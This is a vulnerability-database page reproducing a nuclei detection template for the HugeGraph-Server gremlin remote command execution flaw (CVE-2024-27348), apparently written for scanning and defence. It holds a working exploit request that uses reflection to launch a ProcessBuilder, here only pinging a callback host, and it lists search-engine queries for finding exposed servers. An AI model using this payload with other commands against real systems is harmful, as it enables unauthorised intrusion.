Lucene search
K

Apache HugeGraph-Server - Remote Command Execution

🗓️ 18 Jun 2026 12:11:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 248 Views

Apache HugeGraph-Server has a high severity remote command execution vulnerability in gremlin component, affecting versions prior to 1.3.0

Related
Refs
Code
id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  impact: |
    Unauthenticated attackers can execute arbitrary commands via the gremlin component in Apache HugeGraph-Server, potentially compromising the entire graph database system.
  remediation: |
    Update Apache HugeGraph-Server to version 1.3.0 or later.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.9921
    epss-percentile: 0.99929
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache,kev,vkev,vuln

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and
# digest: 4b0a00483046022100837eb94a98c289092f5a9bdacdda059b45a4b75b843469ffbf0b5b00a679ff45022100eef2f864e9de7bb0a4e28c8110c532de1c532434825fbf6ce73bff08c1c641b9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.8
EPSS0.9921
SSVC
248